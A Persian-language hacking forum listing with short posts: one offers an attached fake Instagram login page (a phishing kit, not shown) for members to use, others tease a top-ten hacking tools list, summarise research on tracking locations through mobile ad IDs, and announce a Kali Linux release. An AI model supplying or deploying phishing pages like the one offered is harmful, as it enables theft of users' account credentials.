    با سلام خدمت تمام کاربران و مدیران GUARDIRAN در این تاپیک قصد دارم یک پیج فیک اینستاگرام رو به شما دوستان عزیز بدم . فقط دوستان توجه داشته باشید که باید هر چیزی که بین این کامنت هست رو حذف کنید : <!--***************************** MR.MSA *****************************--> برای دانلود به فایل پیوست مراجعه کنید . --------------------- امید وارم از این پست لذت برده باشید و از فیک پیج اینستاگرام استفاده کرده باشید . یه مشکلات ریز داشت یه خوبی خودتون ببخشید . ******************** MR.MSA ***************** Fake Page Instagram.zip
  21. Mr.Nashena3
    با سلام در این پست میخوام ۱۰ ابزار برتر هک در سال ۲۰۱۸ رو در اینجا معرفی کنم امیدوارم که مفید باشه سوالات خود راجب هر یک از ابزار رو در یک پست جدید اعلام کنید با تشکر Mr.Nashena3
  22. mownten
    محققین دانشگاه واشنگتن به روشی برای ردیابی موقعیت مکانی افراد با استفاده از تبلیغات درون اپلیکیشن ها دست یافتند. این نتایج، فصل جدیدی را در بحث امنیت و حریم شخصی از طریق سیستم های تبلیغاتی باز می کند. پژوهشگران در این روش اقدام به خرید تبلیغات هدفمند برای مکان ها و اپلیکیشن های خاص نمودند و سپس آمار استفاده از آنها را بررسی کردند. نتایج حاصل نشان داد می توان موقعیت مکانی افراد را با دقت حدود 8 متر به دست آورد، ضمن اینکه تبلیغات روی اپلیکیشن های بسیار پر کاربرد مانند Imgur یا Words with Friends یا Talkatone انجام شده بود. همچنین نمایش تبلیغات اختصاصی برای یک مکان خاص می تواند کاربرانی که در آن موقعیت حاضر هستند را به خریدار تبلیغات نشان دهد، قابلیتی که به راحتی در اختیار تمامی افراد قرار می گیرد و از طریق آن می توان جلسات کاری محرمانه یا قرارهای دوستانه را شناسایی کرد. عملیات ردیابی از طریق شناسه تبلیغات موبایلی (MAID) کاربر انجام می شود که باید محرمانه باشد، اما ظاهراً کشف آن چندان سخت نیست و هکرها به راحتی می توانند MAID را به دست آورند. نکته جالب این است که هیچ راهی برای جلوگیری یا تعدیل حملات جاسوسی از طریق تبلیغات موبایلی وجود ندارد مگر اینکه اپلیکیشن های مورد نظر را حذف کرده یا ارتباط خود را با اینترنت قطع نمایید. محققین پیشنهاد می دهند شرکت های تبلیغاتی شناسه های کاربران را دائماً تغییر داده و مراقب موارد مشکوک باشند تا احتمال موفقیت اینگونه حملات هدفمند کاهش یابد. منبع : ترجمه دیجیاتو از Wired
  23. DeMoN
    سلام به دوستان. خوب همونطور که از عنوان پست فهمیده میشه نسخه 2016.2 کالی لینوکس منتشر شد. در این نسخه از کالی لینوکس یکسری از باگ های و مشکلات گرافیکی و سازگاری های کالی لینوکس حل شده و محیطی جذاب رو برای کاربران ایجاد کرده. هر چه سریعتر پیشنهاد میکنم کالی لینوکستون رو آپدیت کنید تا از آخرین ویرایش این سیستم عامل استفاده کنید. دانلود انواع نسخه ها و ویرایش های کالی لینوکس 2016.2 از سایت رسمی کالی لینک دانلود موفق باشید
×
×
  • ایجاد مورد جدید...